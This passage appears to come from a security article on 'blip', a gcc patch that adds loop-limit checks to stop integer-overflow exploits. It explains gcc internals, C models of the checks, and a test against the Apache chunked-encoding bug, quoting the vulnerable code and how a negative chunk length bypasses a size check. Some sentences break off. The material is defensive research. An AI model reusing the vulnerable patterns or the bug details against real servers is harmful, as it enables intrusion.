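    return (uint32_t)(0x100000000ULL - extra);
}

/* Smallest len for which len * size no longer fits in 32 bits (size >= 2). */
static uint32_t min_trigger_mul(uint32_t size)
{
    return (uint32_t)((0x100000000ULL + size - 1) / size);
}

int main(void)
{
    /* Constructed sample inputs: one benign value, the rest from the text. */
    const uint32_t samples[] = { 5u, 0x7fffffffu, 0x80000000u, 0xffffffffu };
    const uint32_t sizes[] = { 4u, 64u };
    size_t i;

    printf("input       len+1       signed<8  flagged\n");
    for (i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        struct views v = interpret(samples[i], 8);
        printf("0x%08x  0x%08x  %-8s  %s\n",
               (unsigned)samples[i], (unsigned)v.alloc_plus_one,
               v.passes_signed_check ? "pass" : "reject",
               v.over_threshold ? "yes" : "no");
    }

    printf("len + 1 wraps from 0x%08x\n", (unsigned)min_trigger_add(1u));
    for (i = 0; i < sizeof sizes / sizeof sizes[0]; i++) {
        uint32_t t = min_trigger_mul(sizes[i]);
        /* A trigger at or below the threshold is the case that calls
         * for the smaller threshold mentioned in the text. */
        printf("len * %2u wraps from 0x%08x (%s threshold)\n",
               (unsigned)sizes[i], (unsigned)t,
               t > THRESHOLD ? "above" : "not above");
    }
    return 0;
}
```

With 64-byte objects the smallest wrapping value is 0x4000000, which 
stays under the 0x40000000 threshold; this is the case the smaller 
threshold mentioned above is meant for.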

--[ 4 - Part III - Implementation

----[ 4.1 - Introduction 

Once we have suggested a way to detect integer attacks, it will be nice 
to implement a system based on that idea. A possible candidate for 
implementing this system is to extend an existing compiler. Since the 
compiler knows about all loops in the application, it will be possible 
for the compiler to add the appropriate security checks before any "count 
loop". Doing so will secure the application without any knowledge of the 
specific vulnerability.

Therefore I chose to implement this system as a gcc patch and name it 
"Big Loop Integer Protection" a.k.a. blip. Using the -fblip flag one may 
now be able to protect one's application from the next yet-to-be-public 
integer exploit.

----[ 4.2 - Why gcc?

Choosing gcc was not a tough decision. First, this compiler is one of the 
most common compilers in the Linux, *nix world. Therefore, patching gcc 
will allow protecting all applications compiled with gcc. Second, gcc 
is open-source, therefore it may be feasible to implement this patch 
in the first place. Third, previous security patches were implemented as 
gcc patches (StackGuard, ProPolice). So why not follow their wisdom? 

----[ 4.3 - A bit about gcc

Well.., all happy I sat down knowing that I'm about to make a gcc patch 
for preventing integer attacks. But, except for that, what do I really 
know about gcc at all? I must admit that the answer to that question was 
- "not much". 

To overcome this little problem, I was looking for some documentation 
about gcc internals. I also hoped to find something similar to what I 
wanted to do, which already exists. Fast enough, it was clear that before 
jumping to other examples, I must understand the gcc beast. 

.. Two weeks later, I have read enough of the gcc internal documentation, 
and I spent enough time in debugging sessions of the compiler, to be able 
to start modifying the code. However before I start jumping into details 
I would like to provide some background about how gcc works, which I hope 
the reader will find useful.

------[ 4.3.1 - Compilation flow 

The gcc compiler is really an amazing machine. The design goals of gcc 
include the ability to support multiple programming languages, which 
later can be compiled into multiple platforms and instruction sets. In 
order to achieve such a goal, the compiler uses several abstraction 

At first, a language file is processed (parsed) by a language "Front 
End". Whenever you invoke the gcc compiler, the compiler will decide 
which of the available "Front End"s is good for parsing the input files, 
and will execute that "Front End". The "Front End" will parse the whole 
input file and will convert it (using many global helper functions) to an 
"Abstract Syntax Tree" (AST). By doing so the "Front End" makes the 
original programming language transparent to the gcc "Back End". The AST 
as its name suggests, is a data-structure, which resides in memory and 
can represent all the features of all the programming languages gcc 

Whenever the "Front End" finishes parsing a complete function, and 
converts it to an AST representation, a gcc function called 
rest_of_compilation is called. This function takes down the AST 
output from the parser and "expands" it into a "Register Transfer 
Language" (RTL). The RTL, which is the "expanded" version of the AST, is 
then processed again and again through the many different phases of 

To get a feeling for the work that is done on the RTL tree, here is a 
subset of the different phases:
 - Jump Optimization
 - CSE (Common sub-expression elimination)
 - Data flow analysis
 - Instruction combination
 - Instruction scheduling
 - Basic block reordering
 - Branch shortening
 - Final (code generation)

I've selected only a few phases out of the big list of phases to 
demonstrate the work done on RTL. The full list is much more extensive 
and can be found in the gcc internal docs (see "Getting started" for a 
link to the docs). The nice thing about RTL is that all those phases are 
performed independent of the target machine. 

The last phase which is performed on the RTL tree will be the "final" 
phase. At that point the RTL representation is ready to be substituted by 
actual assembly instructions that deal with the specific architecture. 
This phase is possible due to the fact that gcc maintains an abstract 
definition of "machine modes": a set of files that can describe each 
supported machine's hardware and instruction set in a way that makes it 
possible to translate RTL to the appropriate machine code.

------[ 4.3.2 - The AST

I will now focus on the AST, which I will refer to as the "TREE". This 
TREE is the output of the front end parsing of a language file. The TREE 
contains all the information existing in the source file which is 
required for code generation (e.g. declaration, functions, types..). In 
addition the TREE also includes some of the attributes and implicit 
transformations that the compiler may choose to perform (e.g. type 
conversion, auto variables..). 

Understanding the TREE is critical for creating this patch. Fortunately 
the TREE is well structured and even if its object-oriented-like-
programming-using-c is overwhelming at first, after a few debugging 
sessions, everything starts to fall into place. 

The core data structure of the TREE is the tree_node (defined in tree.h). 
This structure is actually one big union that can represent any piece of 
information. The way it works is that any tree node has its code, which 
is accessible using "TREE_CODE (tree node)". Using this code the compiler 
may know which of the union fields are relevant for that node (e.g. a 
constant number will have TREE_CODE() == INTEGER_CST, therefore 
node->int_cst is going to be the union member that will have the valid 
information). As a note, I will say that there is no need to access any 
of the tree node structure fields directly. For each and every field in 
that structure there is a dedicated macro that provides uniform access to 
that field. In most cases this macro will contain some additional checks 
of the node, and maybe even some logic to execute whenever access to that 
field is made (e.g. DECL_RTL, which is responsible for retrieving the RTL 
representation of a TREE node, will call make_decl() if no RTL expression 
exists for that node).

So we know about the TREE and tree node, and we know that each node can 
represent many different things, what else is important to know about the 
tree nodes? Well, one thing is the way tree nodes are linked to each 
other. I will try to give a few sample scenarios that represent most of 
the cases where one tree node is related to another one.

Reference I - Chains:
A chain is a relation that can be best described as a list. When the 
compiler needs to maintain a list of nodes *that don't have any link-
related information*, it will simply use the chain field of the tree node 
(accessible using the TREE_CHAIN() macro). An example for such a case is 
the list of statement nodes in a function body. For each statement in a 
COMPOUND_STMT list there is a chained statement that represents the 
following statement in the code.

Reference II - Lists:
Whenever simple chaining is not enough, the compiler will use a special 
tree node code of TREE_LIST. TREE_LIST allows the compiler to save some 
information attached to each item on the list. To do so each item in the 
list is represented by three tree nodes. The first tree node will have 
the code TREE_LIST. This tree node will have the TREE_CHAIN pointing to 
the next node in the list. It will have the TREE_VALUE pointing to the 
actual tree node item, and it will also have TREE_PURPOSE which may point 
to another tree node that holds extra information about this item's 
meaning in the list. As an example, the tree node of code CALL_EXPR will 
have a 
TREE_LIST as its second operand. This list will represent the parameters 
sent to the called function.

Reference III - Direct reference:
Many of the tree node fields are tree nodes themselves. It may be 
confusing at first glance, but it will be clear soon enough. A few common 
examples are:
 - TREE_TYPE this field represents the type of a tree node. For example 
each tree node with expression code must have a type. 

 - DECL_NAME whenever some declaration tree nodes have a name, it will 
not exist as a string pointed directly by the declaration tree node. 
Instead using the DECL_NAME one can get access to another tree node of 
code IDENTIFIER_NODE. The latter will have the requested name 

 - TREE_OPERAND() One of the most commonly used references. Whenever 
there is a tree node, which has a defined number of "child" tree nodes, 
the TREE_OPERAND() array will be used (e.g. tree node of code IF_STMT 
will have TREE_OPERAND(t,0) as a COND_EXPR node, TREE_OPERAND(t,1) as the 
THEN_CLAUSE statement node, and TREE_OPERAND(t,2) as the ELSE_CLAUSE 
statement tree node.)

Reference IV - Vectors:
Last and much less common is the tree node vector. This container, which 
is accessible using the TREE_VEC_XXX macros, is used to maintain varying 
size vectors.

There is a lot more to know about AST tree nodes for which the gcc 
internal documents may have better and more complete explanations. So I 
will stop my AST overview here with a suggestion to read the docs.

In addition to storing the abstract code in the AST, there are several 
global structures, which are being extensively used by the compiler. I 
will try to name a few of those global structures that I found very 
useful to check out while doing some debugging sessions.

  - current_stmt_tree : provides the last added stmt to the tree, last 
expression type, and the expression file name.

  - current/global_binding_level : provides binding information, 
such as defined names in a particular binding level, and block pointers

  - lineno : var containing the line number that is parsed at the moment
  - input_filename: file name that is parsed at the moment

------[ 4.3.3 - Getting started 

If you want to experience the AST tree yourself, or to dig into the patch 
details, it is recommended to read this getting started section. You are 
safe to continue to the next section if you do not wish to do that.

First things first, get the compiler source code. The version I used as 
base for this patch is gcc 3.2. For information about download and build 
of the compiler please check 

(Please remember to specify the compiler version you wish to download. 
The default version may be the last-release, which was not checked 
against this patch)

The next thing you may want to do is to sit down and carefully read the 
gcc internal documents. (For the sake of this patch, you should be 
familiar with the first 9 sections of this document.) The document is 
located

Assuming you have read the document and you want to go to the next level, 
I recommend having a set of simple programs to be used as compiler 
language files, your debugger of choice, and start debugging the 
compiler. Some good break points that you might find useful are:

  - add_stmt : called whenever the parser decides to add a new statement 
into the AST. This break point may be very handy when it is not so clear 
how a specific tree node is being created. By breaking on add_stmt and 
checking up the call stack, it is easy to find more interesting places to 
dig into.

  - rest_of_compilation : called whenever a function was completely 
converted into AST representation. If you are interested in checking out 
how the AST is turning into RTL this is a good place to start.

  - expand_stmt: called each time a statement is about to be expanded 
into RTL code. Setting a break point here will allow you to easily 
investigate the structure of an AST tree node without the need to go 
through endless nesting levels. 

<TIP> Since the gcc compiler will end up calling the cc1 compiler for *.c 
files, you may want to debug cc1 in the first place, and save yourself 
the trouble of making your debugger follow the child process of gcc 

Soon enough you will need some reference for all the little macros used 
while messing with the AST tree. For that I recommend getting familiar 
with the following files:


----[ 4.4 - Patch Goals 

As with every project in life, you have to define the project goals. 
First, you will better know whether you have reached your goals. Second, 
and no less important, since resources are limited, it is much easier to 
protect yourself from a never-ending project. 

The goals of this patch were above all to be a proof of concept for the 
suggested integer exploits prevention scheme. It is therefore *not* a 
goal to solve all current and future problems in the security world, or 
even to solve all exploits that have integer input related to them.

The second goal of this implementation is to keep the patch simple. Since 
the patch is only a proof of concept, we preferred to keep things simple 
and avoid fancy solutions if they required more complex code. 

Last but not least the third goal is to make this patch usable. That 
means easy to use, intuitive, and able to protect real world packages 
bigger than 30 lines of code :).

----[ 4.5 - Patch overview

The patch will introduce a new flag to the gcc compiler named "blip". By 
compiling a file using the -fblip flag, the compiler generates code 
that will check for the "blip" condition for every for/while loop and for 
every call to a "loop like" function.

A "loop like" function is any function that is a synonym for a loop. 
(e.g. memcpy, bcopy, memset, etc.).

The generated check will evaluate whether a loop is about to execute a 
"huge" number of times (defined by LIBP_MAX). Each time a loop is about to 
execute, the generated code verifies that the loop limit is smaller than 
the threshold. If an attempt to execute a loop more than the threshold 
value is identified, the __blip_violation() handler will be called 
instead of the loop, leading to a controlled termination of the 

The current version of the patch will support only the C language. This 
decision was made in order to keep this first version of the patch small 
and simple. Also, all the vulnerable packages that this patch was planned 
to protect are written in C. So I thought that having only C is a good 

------[ 4.5.1 - Tactics

Having the above goals in mind, I had to make some decisions during the 
development of the patch. One of the problems I had was to choose the 
right place to hack the code. There are quite a lot of options available, 
and I will try to give some pros and cons for each option, hoping it will 
help others to make educated decisions once they encounter the same 

The first thing that I had to decide was the program representation I 
want to modify. The process of compilation looks more or less like this:

Processing         Program representation
------------       ----------------------
Programming  =>    1. Source code
Parsing      =>    2. AST
Expanding    =>    3. RTL
"final"      =>    4. Object file

So what is the right place to implement the checks? 

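The following table lists some of the pros and cons for modifying the 
code at different stages during the compilation process.

+-------------+-----------------------------+---------------------------+
|Stage        |Pros                         | Cons                      |
+-------------+-----------------------------+---------------------------+
| AST         |- Target independent         |- No access to hardware    |
|             |- Language independent       |  Registers, instructions  |
|             |- Optimization independent   |                           |
|             |- High level Access to       |                           |
|             |  language "source"          |                           |
|             |- Intuitive to add code      |                           |
+-------------+-----------------------------+---------------------------+
| RTL         |- Target independent         |- Low level "source" access|
|             |- Language independent       |- May interfere with       |
|             |- Full access to target      |  optimization             |
|             |  hardware                   |                           |
+-------------+-----------------------------+---------------------------+
| Object file |- Language independent       |- Hardware dependent       |
|             |                             |- Lack syntax information  |
|             |                             |- Modification of flow may |
|             |                             | break compiler logic      |
+-------------+-----------------------------+---------------------------+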

After some thought I decided to modify the AST representation. It seems 
to be the most natural place to do such a change. First, the patch 
doesn't really need to access low-level information such as hardware 
registers, or even virtual register allocations. Second, the patch can 
easily modify the AST to inject custom logic into it, while doing the 
same at the RTL level will require major changes, which will hurt the 
abstraction layers defined in gcc.

Solving my second dilemma was not as easy as the first one. Now that AST 
patching was the plan I had in mind, I needed to find the best point in 
time in which I will examine the existing AST tree, and emit my checks on 
it. I had three possible options. 

1) Add a call to my function from the parser code of some language (which 
happened to be C). By doing so, I have the chance to evaluate and modify 
the tree "on the fly" and therefore save an extra pass over the tree 
later. A clear disadvantage is that the patch becomes language dependent. 

2) Wait until the whole function is parsed by the front-end. Then go 
through the created tree, before converting it to RTL, and find the 
places which require checks, and patch them. An advantage of this method 
is that the patch is no longer language dependent. On the other hand, 
implementing a "tree walk" that will scan a given tree is quite a complex 
and error-prone task, which will go against the goals we defined above, 
such as a simple and useful patch. 

3) Patch the AST tree *while* it is being converted into RTL. Although 
this option looks like the most advantageous (language independent, no 
need for a tree walk) it still has a major disadvantage, which is the 
uncertainty of being able to *safely* modify the AST tree at that time. 
Since the RTL "conversion machine" has already processed some parts of 
the AST tree, it might be dangerous to patch the AST tree at that time.

Finally, I have decided that the goal of making this patch simple 
implies selecting the first option of calling my evaluation functions 
from the C parser.

I've placed the hook into my patch in three locations. Two calls inside 
the c-parse.y (main parser file) code allow me to examine the FOR and 
WHILE loops and to modify them on the fly. The third call is located 
outside the parser, since catching all call locations was quite tricky to 
do from within the parser. Basically, since a CALL_EXPR is created in 
many different situations, hooking all of them seems to be unnatural. The 
alternative that I found, which seems to work just fine for me, was to 
add a call to my function inside build_function_call() within the 
c-typeck.c file (C compiler type-checking expression builder).

The main entry into the patch is the blip_check_loop_limit() function 
which will do all the work of checking if a loop seems to be relevant, 
and to call the right function that will do the actual patching of the 
AST tree.

In order for a loop to be considered it needs to look like a count loop. 
The blip patch will therefore try to examine each loop and decide if the 
loop seems to be a counter loop (exact criteria for examining loops will 
follow). For each count loop an attempt is made to detect the "count" 
variable and the "limit" variable.

Example of simple loops and their variables:
 - for(i=0; i < j; i+=3){;} ==> Increment loop, i = count j = limit.
 - while(len--){;} ==> decrement loop, len = counter ; 0 = limit.

The current implementation considers a loop as a count loop only if:
 - 2 variables are detected in the loop condition 
   (sometimes one of them can be a constant)
 - one of those variables is modified in the loop condition or in the 
loop expr
 - *only one* variable is modified
 - the modification is of the increment / decrement style (++,--,+=,-=)

The code, which examines the loop, is executed in blip_find_loop_vars() 
and it may be improved in the future to identify more loops as count 

After detecting the loop direction, the loop count and the limit, the AST 
tree is modified to include a check that verifies that a big loop is 
reported as a blip violation.

In order to keep the patch simple and risk free, any time a loop seems 
too complex to be understood as a count loop, the loop will be ignored 
(Using the blip warning flags it's possible to list the ignored loops, 
and the reason why they were ignored). 

------[ 4.5.2 - Modifying the AST

When you start patching complex applications such as gcc, you want to 
make sure you are not causing any "butterfly effect" while modifying 
memory resident structures on the fly. To save yourself from a lot of 
trouble I will suggest avoiding modification to any structure directly, 
and instead using the existing functions that the language parser would 
have used if the code you want to "inject" was found in the original 
source code. Following this layer of encapsulation will save you from 
making mistakes such as forgetting to initialize a structure member, or 
not updating another global variable or flag. 

I found it very helpful to simulate the code injection by actually 
modifying the source code, and tracing the compiler as it builds the AST 
tree, and later mimicking the code creation by using the same functions 
used by the parser to build my new check code. This way I was able to 
eliminate the need of "dirty" access to the AST tree, which I was quite 
afraid of while starting the modification.

Knowing the right set of functions to use to inject any code I would 
like, the question became what would I really like to inject? The answer 
differs a bit between the different loop types. In the case of a for-loop 
the blip patch will add the check expression as the last expression in 
the FOR_INIT statement. In the case of the while loop the blip patch will 
add the check expression as a new statement before the while loop. In the 
case of a function call to a "loop like" function such as memcpy, the 
blip patch will replace the whole call expression with a new condition 
expression, having the __blip_violation on the "true" side, and the 
original call expression on the "false" side.

Let's illustrate the last paragraph with some samples..

Before blip

1) for(i=0;i< len;i++){}

2) while(len--){}

3) p = memcpy(d,s,l)

After blip

1) for(i=0,<blip_check>?__blip_violation:0;i<len;i++){}

2) <blip_check>?__blip_violation:0;
   while(len--){}

3) p = <blip_check>?__blip_violation : memcpy(d,s,l)

The <blip_check> itself is quite simple. If the loop is incremental 
(going up) then the check will look like: (limit > count && limit-count > 
max).  If the loop is going down the check will be (count > limit && 
count - limit > max). There is a need to check the delta between the 
count and the limit and not only the limit since we don't want to trigger 
a false positive in a loop such as:

len = 0xffff0000;
for(i=len-20;i < len; i++){};

The above example may look at first like an integer exploit. But it may 
also be a legitimate loop which simply happens to iterate over very high 

The function responsible for building the <blip_check> is 
blip_build_check_exp(), and its code is self-explanatory, so I will 
not duplicate the function comments here.
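
The delta check and the three injection sites described above can be 
modelled in plain C. This is an added example and not the patch's own 
code (the patch builds these expressions as AST nodes); every name 
below is an assumption, and the guarded functions return -1 at the 
point where the patched program would call __blip_violation().

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define EXAMPLE_MAX 0x40000000u   /* threshold value from section 3.3 */

enum loop_dir { LOOP_UP, LOOP_DOWN };

/* The two <blip_check> forms from the text, on 32-bit unsigned operands. */
static int blip_check(enum loop_dir dir, uint32_t count, uint32_t limit,
                      uint32_t max)
{
    if (dir == LOOP_UP)
        return limit > count && limit - count > max;
    return count > limit && count - limit > max;
}

/* A check on the limit alone, kept only to show the false positive. */
static int limit_only_check(uint32_t limit, uint32_t max)
{
    return limit > max;
}

/* Model of: for (i = start; i < limit; i++) {} with the check evaluated
 * where FOR_INIT would run. Returns the iteration count or -1. */
static long guarded_count_up(uint32_t start, uint32_t limit)
{
    long iterations = 0;
    uint32_t i;

    if (blip_check(LOOP_UP, start, limit, EXAMPLE_MAX))
        return -1;
    for (i = start; i < limit; i++)
        iterations++;
    return iterations;
}

/* Model of: while (len--) {} with the check as a statement before it.
 * Here len is the counter and 0 is the limit. */
static long guarded_count_down(uint32_t len)
{
    long iterations = 0;

    if (blip_check(LOOP_DOWN, len, 0u, EXAMPLE_MAX))
        return -1;
    while (len--)
        iterations++;
    return iterations;
}

/* Model of a "loop like" call: memcpy counts from 0 up to n, so the
 * call is replaced by check ? violation : memcpy(...). */
static int guarded_memcpy(void *dst, const void *src, uint32_t n)
{
    if (blip_check(LOOP_UP, 0u, n, EXAMPLE_MAX))
        return -1;
    memcpy(dst, src, n);
    return 0;
}

int main(void)
{
    char buf[8] = { 0 };
    uint32_t len = 0xffff0000u;   /* the legitimate loop from the text */

    printf("limit-only check flags it: %d\n",
           limit_only_check(len, EXAMPLE_MAX));
    printf("delta check flags it:      %d\n",
           blip_check(LOOP_UP, len - 20u, len, EXAMPLE_MAX));
    printf("iterations executed:       %ld\n",
           guarded_count_up(len - 20u, len));

    /* Constructed inputs: a 4-byte copy, then a length of 0xffffffff. */
    printf("memcpy n=4:          %d\n", guarded_memcpy(buf, "abcd", 4u));
    printf("memcpy n=0xffffffff: %d\n",
           guarded_memcpy(buf, "abcd", 0xffffffffu));
    printf("while(len--) len=0x80000000: %ld\n",
           guarded_count_down(0x80000000u));
    return 0;
}
```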

One of the difficulties I had while injecting the blip code was the 
injection of the __blip_violation function into the target file. While 
creating the <blip_check> I simply created expressions which reference 
the same tree nodes I found in the loop condition or as a parameter to 
the loop like function call. But the __blip_violation function didn't 
exist in the name space of the compiled file, and therefore trying to 
reference it was a bit trickier, or so I thought. Usually when a 
CALL_EXPR is created, a FUNCTION_DECL is identified (as one of the 
available functions visible to the caller) and an ADDR_EXPR is later 
created to express the address of the declared function. Since 
__blip_violation was not declared, attempts to execute lookup_name() for 
that name will yield an empty declaration. 

Fortunately gcc was kind / forgiving enough, and I was able to build a 
FUNCTION_DECL and reference it leaving all the rest of the work for the 
RTL to figure out. The code, which builds the function call, is located 
in blip_build_violation_call(). The function body of __blip_violation is 
located in the libgcc2.c (Thanks to ProPolice for giving an example..).

<DISCLAIMER> All the modification above is being done in the spirit of 
proof of concept for the blip integer exploits detection. There is no 
warranty that the patch will actually increase the protection of any 
system, nor that it will keep the compiler stable and usable (while using 
-fblip), nor that any of the coding / patching recommendation made in the 
article will make any sense to the hardcore maintainer of the gcc project 

----[ 4.6 - Limitations

This section summarizes the limitations known to me at the time of 
writing this article. I will start from the high-level limitations going 
to the low level technical limitations. 

 - The first limitation is the coverage of the patch. The patch is 
designed to stop integer vulnerabilities that yield big loops. Other 
vulnerabilities that are due to bad design or lack of integer validation 
will not be protected. 

For example the following code is vulnerable but cannot be protected by 
the patch:

void foo(unsigned int len,char* buf){

	char	dst[10];

	if(len < 10){

 - Sometimes a generic integer overflow done "by the book" will not be 
detected. An example for such a case will be the xdr_array vulnerability. 
The problem is due to the fact that the malloc function was called with 
the overflowed expression of *two* different integer inputs, while the 
blip protection can handle only a single big count loop. When looking at 
the xdr_array loop, we can see that it will be easy for the attacker to 
supply such input integers that will overflow the malloc expression, but 
will still keep the loop count small.

 - Some count loops will not be considered. One example is a loop with a 
complex condition, where it is non-trivial to identify the count loop. 
Such loops must be ignored, or otherwise false positives may occur which 
may lead to undefined execution.

 - [Technical limitation] The current version is designed to work only 
with C language. 

 - [Technical limitation] The current version will not examine embedded 
assembly code which may include "loop" instructions, therefore allowing 
integer overflow exploitation to go undetected.

--[ 5 - References

[1] StackGuard 
    Automatic Detection and Prevention of Stack Smashing Attacks

[2] ProPolice 
    GCC extension for protecting applications from stack-smashing attacks

[3] GCC
    GNU Compiler Collection

[4] noir
    Smashing The Kernel Stack For Fun And Profit
    Phrack Issue #60, Phile 0x06 by noir

[5] Halvar Flake
    Third Generation Exploits on NT/Win2k Platforms

[6] MaXX
    Vudo malloc tricks
    Phrack Issue 0x39, Phile #0x08

[7] Once upon a free()..
    Phrack Issue 0x39, Phile #0x09

[8] Aleph One
    Smashing The Stack For Fun And Profit
    Phrack Issue 0x31, Phile #0x0E

--[ 6 - Thanks

I want to thank my team for helping me in the process of creating the 
paper. Thank you Monty, sinan, yona, shok for your helpful comments and 
ideas for improving the paper. If you think the English in this paper is 
broken, imagine what my team had to go through :>. Without you guys I 
would never have made it.

Thanks to anonymous :> for proofreading the paper, and providing helpful 
technical feedback and reassurance.

--[ 7 - Appendix A - Real life examples

Having the patch ready, I wanted to give it a test drive on one of the 
known and high profile vulnerabilities. The criteria used for checking 
the patch were: 

 - The package should be compiled successfully with the patch 
 - The patch should be able to protect the package against exploitation 
of the known bugs

I chose to test the patch on the Apache httpd and OpenSSH packages, since 
both packages are high profile, have vulnerabilities that the patch is 
expected to protect against (in the vulnerable version), and are big 
enough to "qa" the patch a little bit.

The protection test proved to be successful :), and the vulnerable 
version compiled with -fblip proved to be non-exploitable. 

The following section explains how to compile the packages with the blip 
patch. We will show the output assembly generated before / after the 
patch for the code which was enabling the exploit to overflow the program 

----[ 7.1 - Apache Chunked encoding

--[ Vulnerability info

To make sure that everyone is in sync on the Apache chunked-encoding 
vulnerability, I will list part of the vulnerable code, followed by some 
explanation.

Code: Apache src/main/http_protocol.c : ap_get_client_block()

01 len_to_read = get_chunk_size(buffer);

<some code here...>

02 r->remaining = len_to_read;

<some code here...>

03 len_to_read = (r->remaining > bufsiz) ? bufsiz : r->remaining;
04 len_read = ap_bread(r->connection->client, buffer , len_to_read);

The vulnerability in this case allows a remote attacker to send a 
negative chunk length. Doing so bypasses the check at line 3 and ends up 
calling ap_bread() with a huge positive number. 

--[ Testing patch

To compile Apache httpd with -fblip enabled, one may edit the file 
src/apaci and add the following line at the end of the file: 
"echo '-fblip'".

Any attempt to send a negative chunk length after compiling apache httpd 
with the blip patch will end up with the httpd executing the 

According to the blip theory, the attack should trigger some kind of a 
loop. We can see at line 4 of the listed code that a call is made to the 
ap_bread() function. So if the theory is correct we are supposed to find 
a loop inside that function. 

/*
 * Read up to nbyte bytes into buf.
 * If fewer than byte bytes are currently available, then return those.
 * Returns 0 for EOF, -1 for error.
 * NOTE EBCDIC: The readahead buffer _always_ contains *unconverted* data.
 * Only when the caller retrieves data from the buffer (calls bread)
 * is a conversion done, if the conversion flag is set at that time.
 */
API_EXPORT(int) ap_bread(BUFF *fb, void *buf, int nbyte)
{
    int i, nrd;

    if (fb->flags & B_RDERR)
	return -1;
    if (nbyte == 0)
	return 0;

    if (!(fb->flags & B_RD)) {
	/* Unbuffered reading.  First check if there was something in the
	 * buffer from before we went unbuffered. */
	if (fb->incnt) {
	    i = (fb->incnt > nbyte) ? nbyte : fb->incnt;
#ifdef CHARSET_EBCDIC
	    if (fb->flags & B_ASCII2EBCDIC)
		ascii2ebcdic(buf, fb->inptr, i);
	    else
#endif /*CHARSET_EBCDIC*/
	    memcpy(buf, fb->inptr, i);
	    fb->incnt -= i;
	    fb->inptr += i;
	    return i;
	}
	i = read_with_errors(fb, buf, nbyte);
#ifdef CHARSET_EBCDIC
	if (i > 0 && ap_bgetflag(fb, B_ASCII2EBCDIC))
	    ascii2ebcdic(buf, buf, i);
#endif /*CHARSET_EBCDIC*/
	return i;
    }

    nrd = fb->incnt;
/* can we fill the buffer */
    if (nrd >= nbyte) {
#ifdef CHARSET_EBCDIC
	if (fb->flags & B_ASCII2EBCDIC)
	    ascii2ebcdic(buf, fb->inptr, nbyte);
	else
#endif /*CHARSET_EBCDIC*/
	memcpy(buf, fb->inptr, nbyte);
	fb->incnt = nrd - nbyte;
	fb->inptr += nbyte;
	return nbyte;
    }

    if (nrd > 0) {
#ifdef CHARSET_EBCDIC
	if (fb->flags & B_ASCII2EBCDIC)
	    ascii2ebcdic(buf, fb->inptr, nrd);
	else
#endif /*CHARSET_EBCDIC*/
	memcpy(buf, fb->inptr, nrd);
	nbyte -= nrd;
	buf = nrd + (char *) buf;
	fb->incnt = 0;
    }
    if (fb->flags & B_EOF)
	return nrd;

/* do a single read */
    if (nbyte >= fb->bufsiz) {
/* read directly into caller's buffer */
	i = read_with_errors(fb, buf, nbyte);
#ifdef CHARSET_EBCDIC
	if (i > 0 && ap_bgetflag(fb, B_ASCII2EBCDIC))
	    ascii2ebcdic(buf, buf, i);
#endif /*CHARSET_EBCDIC*/
	if (i == -1) {
	    return nrd ? nrd : -1;
	}
    }
    else {
/* read into hold buffer, then memcpy */
	fb->inptr = fb->inbase;
	i = read_with_errors(fb, fb->inptr, fb->bufsiz);
	if (i == -1) {
	    return nrd ? nrd : -1;
	}
	fb->incnt = i;
	if (i > nbyte)
	    i = nbyte;
#ifdef CHARSET_EBCDIC
	if (fb->flags & B_ASCII2EBCDIC)
	    ascii2ebcdic(buf, fb->inptr, i);
	else
#endif /*CHARSET_EBCDIC*/
	memcpy(buf, fb->inptr, i);
	fb->incnt -= i;
	fb->inptr += i;
    }
    return nrd + i;
}

We can see several possible execution flows in the code. Each one of them 
includes a "loop" that moves all the data into the buf parameter. If the 
code supports CHARSET_EBCDIC then the ascii2ebcdic function executes the 
deadly loop. In the other, normal cases, the memcpy function implements 
the deadly loop. 

Following is the assembly code generated for the above function. 

	.type	ap_bread,@function
	pushl	%ebp
	movl	%esp, %ebp
	subl	$40, %esp
	movl	%ebx, -12(%ebp)
	movl	%esi, -8(%ebp)
	movl	%edi, -4(%ebp)
	movl	8(%ebp), %edi
	movl	16(%ebp), %ebx
	testb	$16, (%edi)
	je	.L68
	movl	$-1, %eax
	jmp	.L67
	movl	$0, %eax
	testl	%ebx, %ebx
	je	.L67
	testb	$1, (%edi)
	jne	.L70
	cmpl	$0, 8(%edi)
	je	.L71
	movl	8(%edi), %esi
	cmpl	%ebx, %esi
	jle	.L72
	movl	%ebx, %esi
	cmpl	$268435456, %esi          ------------------------
	jbe	.L73
	movl	%esi, (%esp)               Blip Check (Using esi)
	call	__blip_violation
	jmp	.L74                      ------------------------
	movl	4(%edi), %eax
	movl	12(%ebp), %edx
	movl	%edx, (%esp)
	movl	%eax, 4(%esp)
	movl	%esi, 8(%esp)
	call	memcpy
	subl	%esi, 8(%edi)
	addl	%esi, 4(%edi)
	movl	%esi, %eax
	jmp	.L67
	movl	%edi, (%esp)
	movl	12(%ebp), %eax
	movl	%eax, 4(%esp)
	movl	%ebx, 8(%esp)
	call	read_with_errors
	jmp	.L67
	movl	8(%edi), %edx
	movl	%edx, -16(%ebp)
	cmpl	%ebx, %edx
	jl	.L75
	cmpl	$268435456, %ebx          ------------------------
	jbe	.L76
	movl	%ebx, (%esp)               Blip check (using ebx)
	call	__blip_violation
	jmp	.L77                      ------------------------
	movl	4(%edi), %eax
	movl	12(%ebp), %edx
	movl	%edx, (%esp)
	movl	%eax, 4(%esp)
	movl	%ebx, 8(%esp)
	call	memcpy
	movl	-16(%ebp), %eax
	subl	%ebx, %eax
	movl	%eax, 8(%edi)
	addl	%ebx, 4(%edi)
	movl	%ebx, %eax
	jmp	.L67
	cmpl	$0, -16(%ebp)
	jle	.L78
	cmpl	$268435456, -16(%ebp)     ------------------------
	jbe	.L79
	movl	-16(%ebp), %eax             Blip check
	movl	%eax, (%esp)                (using [ebp-16])
	call	__blip_violation
	jmp	.L80                      ------------------------
	movl	4(%edi), %eax
	movl	12(%ebp), %edx
	movl	%edx, (%esp)
	movl	%eax, 4(%esp)
	movl	-16(%ebp), %eax
	movl	%eax, 8(%esp)
	call	memcpy
	subl	-16(%ebp), %ebx
	movl	-16(%ebp), %edx
	addl	%edx, 12(%ebp)
	movl	$0, 8(%edi)
	testb	$4, (%edi)
	je	.L81
	movl	-16(%ebp), %eax
	jmp	.L67
	cmpl	28(%edi), %ebx
	jl	.L82
	movl	%edi, (%esp)
	movl	12(%ebp), %eax
	movl	%eax, 4(%esp)
	movl	%ebx, 8(%esp)
	call	read_with_errors
	movl	%eax, %esi
	cmpl	$-1, %eax
	jne	.L85
	jmp	.L91
	movl	20(%edi), %eax
	movl	%eax, 4(%edi)
	movl	%edi, (%esp)
	movl	%eax, 4(%esp)
